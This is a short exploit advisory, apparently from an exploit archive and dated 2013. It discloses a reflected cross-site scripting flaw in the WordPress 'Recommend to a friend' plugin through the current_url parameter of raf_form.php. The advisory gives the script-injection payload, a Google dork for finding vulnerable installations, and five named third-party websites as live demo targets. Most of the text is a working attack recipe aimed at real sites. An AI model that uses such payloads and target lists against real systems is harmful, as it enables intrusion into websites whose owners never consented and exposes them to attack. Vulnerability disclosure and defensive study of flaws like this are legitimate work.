####################
# Exploit Title : Wordpress Recommend to a friend plugin Cross site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/recommend-a-friend/
# Software Link : http://downloads.wordpress.org/plugin/recommend-a-friend.2.0.2.zip
# Google Dork : inurl:wp-content/plugins/recommend-a-friend/inc
# Date: 2013-12-23
# Tested on: Windows 7
# discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross site scripting
#
# Location :
localhost/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://acpbusinessclimate.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://chessmaniac.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://foolsforforests.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://thepsychicsline.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
#
http://yesmaine.org/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=
"/><script>alert(1);</script>
#
######################

Thanks.

-- 
Best Regards,
Ashiyane Digital Security Team
http://ashiyane.org/forums